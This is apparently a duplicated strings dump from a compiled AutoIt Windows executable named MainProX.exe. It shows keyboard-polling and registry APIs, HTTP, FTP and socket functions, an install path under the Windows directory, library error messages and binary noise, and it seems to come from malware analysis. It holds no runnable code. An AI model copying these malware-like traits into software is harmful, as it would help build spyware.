iexplore.exe
ad.adb
ad.adb
userip.ipb
userip.ipb
CWebBrowser2
CWebBrowser2
mfc90.dll
mfc90.dll
MSVCR90.dll
MSVCR90.dll
_amsg_exit
_amsg_exit
_acmdln
_acmdln
_crt_debugger_hook
_crt_debugger_hook
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
ExitWindowsEx
ExitWindowsEx
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExA
ShellExecuteExA
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
MSVCP90.dll
MSVCP90.dll
WS2_32.dll
WS2_32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
WINMM.dll
WINMM.dll
GetProcessHeap
GetProcessHeap
.PAVCException@@
.PAVCException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCWebBrowser2@@
.?AVCWebBrowser2@@
.?AVCUDPComm@@
.?AVCUDPComm@@
Bogus message code %d
Bogus message code %d
Invalid component ID %d in SOS
Invalid component ID %d in SOS
IDCT output block size %d not supported
IDCT output block size %d not supported
Wrong JPEG library version: library is %d, caller expects %d
Wrong JPEG library version: library is %d, caller expects %d
Invalid memory pool code %d
Invalid memory pool code %d
Unsupported JPEG data precision %d
Unsupported JPEG data precision %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters at scan script entry %d
Invalid scan script at entry %d
Invalid scan script at entry %d
Improper call to JPEG library in state %d
Improper call to JPEG library in state %d
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Buffer passed to JPEG library is too small
Buffer passed to JPEG library is too small
Too many color components: %d, max %d
Too many color components: %d, max %d
Unsupported color conversion request
Unsupported color conversion request
Bogus DAC index %d
Bogus DAC index %d
Bogus DAC value 0x%x
Bogus DAC value 0x%x
Bogus DHT index %d
Bogus DHT index %d
Bogus DQT index %d
Bogus DQT index %d
Empty JPEG image (DNL not supported)
Empty JPEG image (DNL not supported)
Maximum supported image dimension is %u pixels
Maximum supported image dimension is %u pixels
Cannot transcode due to multiple use of quantization table %d
Cannot transcode due to multiple use of quantization table %d
Backing store not supported
Backing store not supported
Huffman table 0xx was not defined
Huffman table 0xx was not defined
Quantization table 0xx was not defined
Quantization table 0xx was not defined
Not a JPEG file: starts with 0xx 0xx
Not a JPEG file: starts with 0xx 0xx
Insufficient memory (case %d)
Insufficient memory (case %d)
Cannot quantize more than %d color components
Cannot quantize more than %d color components
Cannot quantize to fewer than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize to more than %d colors
Cannot quantize to more than %d colors
Unsupported JPEG process: SOF type 0xx
Unsupported JPEG process: SOF type 0xx
Failed to create temporary file %s
Failed to create temporary file %s
Unsupported marker type 0xx
Unsupported marker type 0xx
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unknown APP0 marker (not JFIF), length %u
Unknown APP0 marker (not JFIF), length %u
Unknown APP14 marker (not Adobe), length %u
Unknown APP14 marker (not Adobe), length %u
Define Arithmetic Table 0xx: 0xx
Define Arithmetic Table 0xx: 0xx
Define Huffman Table 0xx
Define Huffman Table 0xx
Define Quantization Table %d precision %d
Define Quantization Table %d precision %d
Define Restart Interval %u
Define Restart Interval %u
Freed EMS handle %u
Freed EMS handle %u
Obtained EMS handle %u
Obtained EMS handle %u
= = = = = = = =
= = = = = = = =
JFIF APP0 marker, density %dx%d %d
JFIF APP0 marker, density %dx%d %d
Warning: thumbnail image size does not match data length %u
Warning: thumbnail image size does not match data length %u
Unknown JFIF minor revision number %d.d
Unknown JFIF minor revision number %d.d
with %d x %d thumbnail image
with %d x %d thumbnail image
Skipping marker 0xx, length %u
Skipping marker 0xx, length %u
Unexpected marker 0xx
Unexpected marker 0xx
%4u %4u %4u %4u %4u %4u %4u %4u
%4u %4u %4u %4u %4u %4u %4u %4u
Quantizing to %d = %d*%d*%d colors
Quantizing to %d = %d*%d*%d colors
Quantizing to %d colors
Quantizing to %d colors
Selected %d colors for quantization
Selected %d colors for quantization
At marker 0xx, recovery action %d
At marker 0xx, recovery action %d
RST%d
RST%d
Smoothing not supported with nonstandard sampling ratios
Smoothing not supported with nonstandard sampling ratios
Start Of Frame 0xx: width=%u, height=%u, components=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Component %d: %dhx%dv q=%d
Component %d: %dhx%dv q=%d
Start Of Scan: %d components
Start Of Scan: %d components
Component %d: dc=%d ac=%d
Component %d: dc=%d ac=%d
Ss=%d, Se=%d, Ah=%d, Al=%d
Ss=%d, Se=%d, Ah=%d, Al=%d
Closed temporary file %s
Closed temporary file %s
Opened temporary file %s
Opened temporary file %s
Unrecognized component IDs %d %d %d, assuming YCbCr
Unrecognized component IDs %d %d %d, assuming YCbCr
Freed XMS handle %u
Freed XMS handle %u
Obtained XMS handle %u
Obtained XMS handle %u
Unknown Adobe color transform code %d
Unknown Adobe color transform code %d
Inconsistent progression sequence for component %d coefficient %d
Inconsistent progression sequence for component %d coefficient %d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Warning: unknown JFIF revision number %d.d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: found marker 0xx instead of RST%d
Corrupt JPEG data: found marker 0xx instead of RST%d
%ld%c
%ld%c
688688688
688688688
.2688688688688688
.2688688688688688
.2688688
.2688688
^['Vc%Xa Tg X_2]m2aj2dj1Zk2gj1]k1_k2ej1Xk2ri3ek4hk1Zj3ik5\e4r\4_o5g[3qc3]]-amNfc8me3e^6`f0Ya7g`1Zf6f`=[d;Zf6h`6WiEmY1Zb1_^FkZ9jY[`>lU2Xj5oXEb[Fj^>lc=n^>lbBlZ@n[5iW?eSEj^Gi^?gUjW=jWAfVmZ>dU
^['Vc%Xa Tg X_2]m2aj2dj1Zk2gj1]k1_k2ej1Xk2ri3ek4hk1Zj3ik5\e4r\4_o5g[3qc3]]-amNfc8me3e^6`f0Ya7g`1Zf6f`=[d;Zf6h`6WiEmY1Zb1_^FkZ9jY[`>lU2Xj5oXEb[Fj^>lc=n^>lbBlZ@n[5iW?eSEj^Gi^?gUjW=jWAfVmZ>dU
YX.QS
YX.QS
w`zuFraxbKf[Eo_Hl]>}dLf[=u_CbRIqc:oXLcY9hR8iSIeX@gV9iS9iT9iT:hU:hU;iV;jW:lV:jV:lW;iV;lX;kX;kY8kR2bA;n[;iV:jU/a>=mYp^)eZ5gU g[/h]1k\:p_)hb1l`/lb ib4na-jb1lb
w`zuFraxbKf[Eo_Hl]>}dLf[=u_CbRIqc:oXLcY9hR8iSIeX@gV9iS9iT9iT:hU:hU;iV;jW:lV:jV:lW;iV;lX;kX;kY8kR2bA;n[;iV:jU/a>=mYp^)eZ5gU g[/h]1k\:p_)hb1l`/lb ib4na-jb1lb
b`8jW)ib1l`/j`*qm3pd)pl1ph/ri*h`3na*jd/i]2fV9\R3m_ ib.kc2iW(g`8pc9wp)kg1j^:vk0k`,ja i`1ql)hb4k]
b`8jW)ib1l`/j`*qm3pd)pl1ph/ri*h`3na*jd/i]2fV9\R3m_ ib.kc2iW(g`8pc9wp)kg1j^:vk0k`,ja i`1ql)hb4k]
.2*46 13
.2*46 13
,0$25'35
,0$25'35
03 2:)33!3@ 29,56
03 2:)33!3@ 29,56
u7uh.oj6oe,xv=
u7uh.oj6oe,xv=
/=!3@"3@
/=!3@"3@
09$4> 12
09$4> 12
1
1
04(48#3:(35
04(48#3:(35
19
19
02 13$24
02 13$24
28L,6@$4D07=
28L,6@$4D07=
2H_#4E
2H_#4E
6jZ.SQ-SS:ign
6jZ.SQ-SS:ign
-0!2?-GR.IT/HS-JT&:Q
-0!2?-GR.IT/HS-JT&:Q
.="3B#4H#4K&5I*8P%5G'6K&5I)7N*"3>!3=-7F.7A'4=*6F48?'5C37:&5@ 5
.="3B#4H#4K&5I*8P%5G'6K&5I)7N*"3>!3=-7F.7A'4=*6F48?'5C37:&5@ 5
/1/56!24$34
/1/56!24$34
.D#?D*>R)9S/OS.MT-MT3KT.IV)6O,8R
.D#?D*>R)9S/OS.MT-MT3KT.IV)6O,8R
*,8?=99!02
*,8?=99!02
0D_&6J)5M'9S;PdPXsjfnYi|Xrnjl
0D_&6J)5M'9S;PdPXsjfnYi|Xrnjl
bdi.HR
bdi.HR
467137345
467137345
1.II}
1.II}
P]v.MU 6K,7I(7P):O$:M.CM;FM9@S-4G$:L'8I)5I(7Q.7E08B(6R"3G"3J#3C17C$6L!16*6I,59!4C!/A
P]v.MU 6K,7I(7P):O$:M.CM;FM9@S-4G$:L'8I)5I(7Q.7E08B(6R"3G"3J#3C17C$6L!16*6I,59!4C!/A
`d%d`M
`d%d`M
/O4
/O4
2O#5N$5M$5Y,CT):] @V,De*9S.LO,D],CK,C] AT AN)6N)7N)6N)6N)6N)5N >O,DP ?P)8N BP,CP)7N-JR*:N ?P)6N)7N)7N)7N)7N(7O*7P&6J
2O#5N$5M$5Y,CT):] @V,De*9S.LO,D],CK,C] AT AN)6N)7N)6N)6N)6N)5N >O,DP ?P)8N BP,CP)7N-JR*:N ?P)6N)7N)7N)7N)7N(7O*7P&6J
2N!5Q!4P)7S*>f,C] C`*=e,DU*Ad,Ea):W*<_ ap>O-HR.KT ?O)7N,CP =O AP*8N)7N)7N)7N*7O)7N
2N!5Q!4P)7S*>f,C] C`*=e,DU*Ad,Ea):W*<_ ap>O-HR.KT ?O)7N,CP =O AP*8N)7N)7N)7N*7O)7N
4W(6L(6a%6^,E_*Ab(7Z,E_ Bc*
4W(6L(6a%6^,E_*Ab(7Z,E_ Bc*
3Q'9]Ê);j.Gf,Da*>Y,F](N-KO0H`,DQ.OR.PP,FO,BQ C]*:L,EO)9N @P)8L)6N)6N)7N*7O$5K
3Q'9]Ê);j.Gf,Da*>Y,F](N-KO0H`,DQ.OR.PP,FO,BQ C]*:L,EO)9N @P)8L)6N)6N)7N*7O$5K
5X"5d'9_Ë*=h.Gd B`(8c C` D_)9a A])9` E[*;L)7M,CN)6T);W*8L.KT @`,CZ A[.LN/Da-HN,D[.HY ?N*8_->\-B[,?V @P(7`*>N ?O)6N)7N'7P 3H!3I
5X"5d'9_Ë*=h.Gd B`(8c C` D_)9a A])9` E[*;L)7M,CN)6T);W*8L.KT @`,CZ A[.LN/Da-HN,D[.HY ?N*8_->\-B[,?V @P(7`*>N ?O)6N)7N'7P 3H!3I
2T(6M!7^":n);i/Dm(7](9p,E]*=k*?e BZ Bc A_(6U)T)6U*:N*:N)6N)7N 8O 4M
2T(6M!7^":n);i/Dm(7](9p,E]*=k*?e BZ Bc A_(6U)T)6U*:N*:N)6N)7N 8O 4M
1Z(>`*@e C`*>h,F](=h ?e D])9i(9d)9^*:])8M)6U)7N(9b*;Y,DO(8Z C`.LT*=Q1Ji.MR2La0L[.MV*@d D] B] @M*8V0Gc'4K*9O)8M)7N)7N)7O%5M
1Z(>`*@e C`*>h,F](=h ?e D])9i(9d)9^*:])8M)6U)7N(9b*;Y,DO(8Z C`.LT*=Q1Ji.MR2La0L[.MV*@d D] B] @M*8V0Gc'4K*9O)8M)7N)7N)7O%5M
5c 4a*7s(7p-?p Cn!:j);i(9l(8[ Ca D_,E`)9Q)7])6V(6X,CW @R,D`.MS*@d.J_1Ld0L^1Lc/LZ1Le.H^ >c.HS.HW*;c,DQ 9U ?L*
5c 4a*7s(7p-?p Cn!:j);i(9l(8[ Ca D_,E`)9Q)7])6V(6X,CW @R,D`.MS*@d.J_1Ld0L^1Lc/LZ1Le.H^ >c.HS.HW*;c,DQ 9U ?L*
3N$4h"Ek%?k0>r.Cj)=e.Gf ?j*7p*?e)
3N$4h"Ek%?k0>r.Cj)=e.Gf ?j*7p*?e)
1W
1W
Kd)f.KY2Lk0L`0L^1Lc0M^/Kc-C`0K_*Ac
Kd)f.KY2Lk0L`0L^1Lc0M^/Kc-C`0K_*Ac
Fd <_ d>\/H`(6a*=U*=Y)6Q*7M&6N
Fd <_ d>\/H`(6a*=U*=Y)6Q*7M&6N
5w 4ao"@u
5w 4ao"@u
@t&Lu);o%6o%;q'9p(6o*G^*
@t&Lu);o%6o%;q'9p(6o*G^*
Lb&;Y ;r.Cm,G\-Bi2Hq1Fp3Kp3Kp3Kp3Kp3Kp3Kp3Kp3Kn1N]2Jr ?i0Gm*
Lb&;Y ;r.Cm,G\-Bi2Hq1Fp3Kp3Kp3Kp3Kp3Kp3Kp3Kp3Kn1N]2Jr ?i0Gm*
:]'4])8n)6d(:h1Kg0Er1Ip.Bo4Lp3Kp3Kp3Kp3Kp3Kp3Kp2Jp/Dq0Eq.Gc3Mi0C`3Jv ;g*?\,E_)7O(7X-9M
:]'4])8n)6d(:h1Kg0Er1Ip.Bo4Lp3Kp3Kp3Kp3Kp3Kp3Kp2Jp/Dq0Eq.Gc3Mi0C`3Jv ;g*?\,E_)7O(7X-9M
Bv'8q*;i$=k&5g'7l!:`*?c.At0Gp1Hp.Bo4Lp3Kp3Kp3Kp3Jp3Ip3Kp3Jp/Dp5Np/Dq0Gq.Do0Jb-Eh);k*>g(8c*8W"5M
Bv'8q*;i$=k&5g'7l!:`*?c.At0Gp1Hp.Bo4Lp3Kp3Kp3Kp3Jp3Ip3Kp3Jp/Dp5Np/Dq0Gq.Do0Jb-Eh);k*>g(8c*8W"5M
Dv*7n'9n&8n);h'5q-An2Ko2Ip-@o4Lp3Kp3Kp3Jn3Lp3Lp3Kp3Kp1Hp4Mp.Bo0Gp4Lp0Fr0Kd)?e D^):c)7S 8L
Dv*7n'9n&8n);h'5q-An2Ko2Ip-@o4Lp3Kp3Kp3Jn3Lp3Lp3Kp3Kp1Hp4Mp.Bo0Gp4Lp0Fr0Kd)?e D^):c)7S 8L
9m,C_$=m$=l1Fp1Gp2Ip0Gp3Lp3Kq3Q}3Po4To3Jp2Jp,@o4Lp4Lp0Ep1Hp*
9m,C_$=m$=l1Fp1Gp2Ip0Gp3Lp3Kq3Q}3Po4To3Jp2Jp,@o4Lp4Lp0Ep1Hp*
Lc)4q->q3Kp.Bo0Gp/Co4Lp3Kp3Il3Io3Hp3Kp3Kp3Kp1Gp1Gp.Bo2Jp1Ip1Ho/Cs D_.Bf(7e*8V
Lc)4q->q3Kp.Bo0Gp/Co4Lp3Kp3Il3Io3Hp3Kp3Kp3Kp1Gp1Gp.Bo2Jp1Ip1Ho/Cs D_.Bf(7e*8V
5]l4Xo3Ip3Kp3Kp3Kp1Hp3Jp0Fp.Co3Jp ?i =\.Ce(6P'6Q
5]l4Xo3Ip3Kp3Kp3Kp1Hp3Jp0Fp.Co3Jp ?i =\.Ce(6P'6Q
5q%9q%;q)7n(8o%6p(8o'7o ;o,>o4Mp2Ip2Ip3Kp3Kq3Kq3Kn3Lp3Kp4Lp/Dp.Co4Mp,?o3Kp1Hp2Jp1Hq ;j ;_(7b*7J%6N
5q%9q%;q)7n(8o%6p(8o'7o ;o,>o4Mp2Ip2Ip3Kp3Kq3Kq3Kn3Lp3Kp4Lp/Dp.Co4Mp,?o3Kp1Hp2Jp1Hq ;j ;_(7b*7J%6N
>v 6q"6p!6p%5o"?t&9p"6p$7p$6p ?u0Jq.Bo5Np/Do1Hp3Ko3Ox3Py4T
>v 6q"6p!6p%5o"?t&9p"6p$7p$6p ?u0Jq.Bo5Np/Do1Hp3Ko3Ox3Py4T
3Nu4Lo0Ep0Fo4Mp-@o.Co0Gp2Hp0Ep*A_*?])6b 4U
3Nu4Lo0Ep0Fo4Mp-@o.Co0Gp2Hp0Ep*A_*?])6b 4U
5q)8o(8o-Eq,@o5Mp-Bo1Gp3Ko3Nu3Nv3Il3Kp4Lp/Dp-Bo4Lp2Ip-Bo/Ep.Bp3Kp-@o.Cm(9k*7U$6N
5q)8o(8o-Eq,@o5Mp-Bo1Gp3Ko3Nu3Nv3Il3Kp4Lp/Dp-Bo4Lp2Ip-Bo/Ep.Bp3Kp-@o.Cm(9k*7U$6N
6q'8o*8n0Fp6Mo/Bn G}3Lr3Im4R}3Pz3Jn3Kp4Lp0Eo,?o2Ip,@o1Gp/Do1Hp-Aq.Dm*=`)6P 5M
6q'8o*8n0Fp6Mo/Bn G}3Lr3Im4R}3Pz3Jn3Kp4Lp0Eo,?o2Ip,@o1Gp/Do1Hp-Aq.Dm*=`)6P 5M
6q&7o-;n)Lt,Lr/K|3Lr3Jn4S~3Pz3Jn3Kp3Lp0Fp,@o2Ip-@o1Hp/Do1Hp.Ap.Dm*=^(7b
6q&7o-;n)Lt,Lr/K|3Lr3Jn4S~3Pz3Jn3Kp3Lp0Fp,@o2Ip-@o1Hp/Do1Hp.Ap.Dm*=^(7b
3r!6p&7p%9q Hv0Kq/Kr4Jn,?o3Kn3Ox3Nu3Ko3Kp4Mp,>o,@p3Kp.Cp/Do1Ip2Ip/Fq*;g(6])7]#6P
3r!6p&7p%9q Hv0Kq/Kr4Jn,?o3Kn3Ox3Nu3Ko3Kp4Mp,>o,@p3Kp.Cp/Do1Ip2Ip/Fq*;g(6])7]#6P
2Jo3Ko4Lo2Ip,?o*o3Jp.Bp(6b*7M
2Jo3Ko4Lo2Ip,?o*o3Jp.Bp(6b*7M
2Jr2Kr0Lx.Cn.Cp*o2Hp
2Jr2Kr0Lx.Cn.Cp*o2Hp
=s'Js-E}0Ku(A|6Lj.J{1Kt.J|0Jv-J~6On ;o(9o2Jp*;o0Dp*
=s'Js-E}0Ku(A|6Lj.J{1Kt.J|0Jv-J~6On ;o(9o2Jp*;o0Dp*
6,{6.|4(~3#
6,{6.|4(~3#
,J~0Jv1Js.Jz4Lp0En0Ep =o):o3Lp*
,J~0Jv1Js.Jz4Lp0En0Ep =o):o3Lp*
4p,>p.Jq'I
4p,>p.Jq'I
(>x(7m*
(>x(7m*
1Ks0Lx0Cl/Bm)9o*:o*;o'6o.Ap);o =p(7k)8P
1Ks0Lx0Cl/Bm)9o*:o*;o'6o.Ap);o =p(7k)8P
3o.Du(E
3o.Du(E
3Lr,Bt'o.Cp*
3Lr,Bt'o.Cp*
.Hx(A{$A
.Hx(A{$A
,Ez.Hy J
,Ez.Hy J
-Du.Fw)=s&>|%7p#6p)8o(8o(8o(8o(8r*8T
-Du.Fw)=s&>|%7p#6p)8o(8o(8o(8o(8r*8T
-K}&G
-K}&G
%6s%6u'7r)8o(8o'6o(6p
%6s%6u'7r)8o(8o'6o(6p
QGxG=zI?xD;u
QGxG=zI?xD;u
F=}8.wC:
F=}8.wC:
5 |5,~5,
5 |5,~5,
5 |5,~5 {-
5 |5,~5 {-
6 v1%x0
6 v1%x0
7-~5,|5,
7-~5,|5,
Z%%U(&O
Z%%U(&O
s- r5/q4,r5-l0%c
s- r5/q4,r5-l0%c
>3v6-t4 r0%d(
>3v6-t4 r0%d(
8-x7.yB8~3*|@7
8-x7.yB8~3*|@7
Gv*@o.Ls Lw*Mt
Gv*@o.Ls Lw*Mt
0Ix)Lu Lw2Lr.Ok/Jo.Nk.Is/Jr
0Ix)Lu Lw2Lr.Ok/Jo.Nk.Is/Jr
4g"6no(6t
4g"6no(6t
!4 "6 !3
!4 "6 !3
#5!#8#'6 !/
#5!#8#'6 !/
HHHsssHHH]]]
HHHsssHHH]]]
88{88{88{88{88{\\
88{88{88{88{88{\\
1.130303.393
1.130303.393
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
MainProX.exe_600:
`.rsrc
`.rsrc
\.ptx|x
\.ptx|x
PSSSSSSh
PSSSSSSh
Gt.Ht$
Gt.Ht$
PSSSh@
PSSSh@
PVSSh@
PVSSh@
f;Crt
f;Crt
?#%X.y
?#%X.y
GetProcessWindowStation
GetProcessWindowStation
operator
operator
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.
kernel32.dll
kernel32.dll
oleaut32.dll
oleaut32.dll
RegDeleteKeyExW
RegDeleteKeyExW
advapi32.dll
advapi32.dll
Error text not found (please report)
Error text not found (please report)
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
\N is not supported in a class
zcÃ
zcÃ
.zV:b
.zV:b
GetProcessHeap
GetProcessHeap
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
SetViewportOrgEx
SetViewportOrgEx
ShellExecuteExW
ShellExecuteExW
SHFileOperationW
SHFileOperationW
ShellExecuteW
ShellExecuteW
RegisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
ExitWindowsEx
ExitWindowsEx
EnumThreadWindows
EnumThreadWindows
UnregisterHotKey
UnregisterHotKey
keybd_event
keybd_event
GetAsyncKeyState
GetAsyncKeyState
SetKeyboardState
SetKeyboardState
GetKeyboardState
GetKeyboardState
GetKeyState
GetKeyState
VkKeyScanW
VkKeyScanW
EnumWindows
EnumWindows
EnumChildWindows
EnumChildWindows
MapVirtualKeyW
MapVirtualKeyW
CloseWindowStation
CloseWindowStation
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationW
OpenWindowStationW
InternetCrackUrlW
InternetCrackUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
FtpOpenFileW
FtpOpenFileW
FtpGetFileSize
FtpGetFileSize
InternetOpenUrlW
InternetOpenUrlW
##@,&,//,))
##@,&,//,))
.jQE2
.jQE2
4`%ud*
4`%ud*
3(-,'')-*/%'
3(-,'')-*/%'
9(***3).**-)'
9(***3).**-)'
H%d=j@
H%d=j@
0!;....(
0!;....(
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
p21jj(%fo0.Kl,(Eq32]d
p21jj(%fo0.Kl,(Eq32]d
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
COMDLG32.dll
COMDLG32.dll
GDI32.dll
GDI32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
MPR.dll
MPR.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
PSAPI.DLL
PSAPI.DLL
SHELL32.dll
SHELL32.dll
USER32.dll
USER32.dll
USERENV.dll
USERENV.dll
UxTheme.dll
UxTheme.dll
VERSION.dll
VERSION.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
WSOCK32.dll
WSOCK32.dll
mscoree.dll
mscoree.dll
combase.dll
combase.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
USER32.DLL
USER32.DLL
>>>AUTOIT NO CMDEXECUTE
>>>AUTOIT NO CMDEXECUTE
CMDLINERAW
CMDLINERAW
CMDLINE
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
/AutoIt3ExecuteScript
APPSKEY
APPSKEY
789:;?
789:;?
FTPSETPROXY
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLRECVMSG
GUICTRLSENDMSG
GUICTRLSENDMSG
GUIGETMSG
GUIGETMSG
GUIREGISTERMSG
GUIREGISTERMSG
HOTKEYSET
HOTKEYSET
HTTPSETPROXY
HTTPSETPROXY
HTTPSETUSERAGENT
HTTPSETUSERAGENT
ISKEYWORD
ISKEYWORD
MSGBOX
MSGBOX
REGENUMKEY
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTE
SHELLEXECUTEWAIT
SHELLEXECUTEWAIT
TCPACCEPT
TCPACCEPT
TCPCLOSESOCKET
TCPCLOSESOCKET
TCPCONNECT
TCPCONNECT
TCPLISTEN
TCPLISTEN
TCPNAMETOIP
TCPNAMETOIP
TCPRECV
TCPRECV
TCPSEND
TCPSEND
TCPSHUTDOWN
TCPSHUTDOWN
TCPSTARTUP
TCPSTARTUP
TRAYGETMSG
TRAYGETMSG
UDPBIND
UDPBIND
UDPCLOSESOCKET
UDPCLOSESOCKET
UDPOPEN
UDPOPEN
UDPRECV
UDPRECV
UDPSEND
UDPSEND
UDPSHUTDOWN
UDPSHUTDOWN
UDPSTARTUP
UDPSTARTUP
SendKeyDelay
SendKeyDelay
SendKeyDownDelay
SendKeyDownDelay
TCPTimeout
TCPTimeout
WINDOWSDIR
WINDOWSDIR
AUTOITEXE
AUTOITEXE
HOTKEYPRESSED
HOTKEYPRESSED
D%s (%d) : ==> %s.:
D%s (%d) : ==> %s.:
Line %d:
Line %d:
Line %d (File "%s"):
Line %d (File "%s"):
%s (%d) : ==> %s:
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
*.au3;*.a3x
All files (*.*)
All files (*.*)
04090000
04090000
%u.%u.%u.%u
%u.%u.%u.%u
0.0.0.0
0.0.0.0
Mddddd
Mddddd
"%s" (%d) : ==> %s:
"%s" (%d) : ==> %s:
\??\%s
\??\%s
GUI_RUNDEFMSG
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
AUTOITCALLVARIABLE%d
255.255.255.255
255.255.255.255
Keyword
Keyword
AUTOIT.ERROR
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 9, 21
3, 3, 9, 21
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_USERS
HKEY_USERS
%d/d/d
%d/d/d
c:\windows\jwxf\MainProX.exe
c:\windows\jwxf\MainProX.exe
%WinDir%\jwxf\MainProX.exe
%WinDir%\jwxf\MainProX.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
